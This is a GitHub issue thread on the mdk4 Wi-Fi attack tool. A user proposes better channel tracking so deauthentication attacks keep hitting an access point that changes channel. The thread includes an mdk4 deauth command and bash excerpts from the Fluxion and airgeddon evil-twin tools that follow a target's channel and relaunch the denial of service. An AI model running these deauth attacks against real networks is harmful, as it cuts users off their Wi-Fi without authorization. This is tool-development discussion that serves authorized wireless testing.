aircrack-ng/mdk4

The channel hopping option needs to be rewritten

Opened this issue · 3 comments

`mdk4 wlan0 d -B mac -c 10`

works just great when specifying the channel,

but without specifying it, the deauth barely works; it's almost like it's not running.

So I am suggesting: why wouldn't there be an argument which, when used, does the channel hopping this way:

  • MDK4 searches for the channel of the target MAC
  • After finding it, it starts the deauth
  • Runs something like airodump-ng on the target AP with the channel it already found, to monitor for a channel change
  • Then, if airodump-ng can no longer detect/find the AP on that channel, it starts looking for the AP on other channels
  • After finding the new channel, it restarts mdk4 with the new channel provided to it as an argument
  • Then airodump-ng starts monitoring the target on that channel again, to look for a possible channel change

That way MDK4 won't need to be hopping channels all the time, disrupting the deauth and making it very, very inefficient.

Fluxion too, the oldest known and most forked evil twin tool, does channel hopping only with two adapters, and instead of one running the deauth and one running the fake AP,
they made one adapter run both while the second looks at and monitors the AP for a channel change, then provides mdk with the new channel if it changed. They obviously did it this way because they found, through tests, that it was not performing as it should when using the built-in channel hopping.

```bash
fluxion_target_tracker_daemon() {
    timeout --preserve-status $monitorTimeout airodump-ng -aw "$capturePath" \
      -d "$FluxionTargetMAC" $FluxionTargetTrackerInterface &> /dev/null

    if [ "$targetChannel" -ne "$FluxionTargetChannel" ]; then
      echo "[T-Tracker] Target channel change detected!"
      FluxionTargetChannel=$targetChannel
      break

  echo "$FluxionTargetChannel" >> "$FLUXIONWorkspacePath/target_info.txt"
```

And another famous tool, airgeddon, created channel hopping in another way using mdk because they found it very inefficient too.
Even though they ran mdk on one adapter and the fake AP on another, they still didn't use the regular mdk channel hopping.

While hopping, the DoS is not effective, but when it hits the right channel it is deauthing again for a while. Then the client could reconnect, but is disconnected again in some seconds when the hopping hits the channel again.

```bash
${mdk_command} ${interface_pursuit_mode_deauth} d -b ${tmpdir}bl.txt -c ${channel}" "${1} (DoS Pursuit mode)"
	sleep ${dos_delay}
	airodump-ng -w "${tmpdir}dos_pm" "${interface_pursuit_mode_scan}" --band "${airodump_band_modifier}" > /dev/null 2>&1 &
	dos_pursuit_mode_scan_pid=$!
	dos_pursuit_mode_pids+=("${dos_pursuit_mode_scan_pid}")

pid_control_pursuit_mode() {

	if [[ -n "${2}" ]] && [[ "${2}" = "evil_twin" ]]; then
		rm -rf "${tmpdir}${channelfile}" > /dev/null 2>&1
		echo "${channel}" > "${tmpdir}${channelfile}"
	fi

	while true; do
		sleep 5
		if grep "${bssid}" "${tmpdir}dos_pm-01.csv" > /dev/null 2>&1; then
			readarray -t DOS_PM_LINES_TO_PARSE < <(cat < "${tmpdir}dos_pm-01.csv" 2> /dev/null)

			for item in "${DOS_PM_LINES_TO_PARSE[@]}"; do
				if [[ "${item}" =~ ${bssid} ]]; then
					dos_pm_current_channel=$(echo "${item}" | awk -F "," '{print $4}' | sed 's/^[ ^t]*//')

					if [[ "${dos_pm_current_channel}" =~ ^([0-9]+)$ ]] && [[ "${BASH_REMATCH[1]}" -ne 0 ]] && [[ "${BASH_REMATCH[1]}" -ne "${channel}" ]]; then
						channel="${dos_pm_current_channel}"
						if [[ -n "${2}" ]] && [[ "${2}" = "evil_twin" ]]; then
							rm -rf "${tmpdir}${channelfile}" > /dev/null 2>&1
							echo "${channel}" > "${tmpdir}${channelfile}"
						fi
						kill_dos_pursuit_mode_processes
						dos_pursuit_mode_pids=()
						launch_dos_pursuit_mode_attack "${1}" "relaunch"
```

I've been struggling with this problem for years, but I noticed that others did too, and they have come up with clever fixes to the problem.

So I thought, why don't I go to the root of the problem? Maybe it would be fixed from there, and that would be the real win.

Thanks a lot, and hope you are doing great.

PS. It's not my first feature suggestion here;
hope this gets accepted like the others.
Regards

E7mer commented

Thanks a lot for your suggestion. The efficiency problem of channel frequency hopping does exist, which is why I haven't added automatic frequency hopping for 5G. I will seriously consider your suggestion and improve the efficiency of this feature.


@E7mer Thanks a lot for your work, mate.

You are doing great work :)

> I will seriously consider your suggestion and improve the efficiency of this feature.

Did you push out patches for that since this conversation?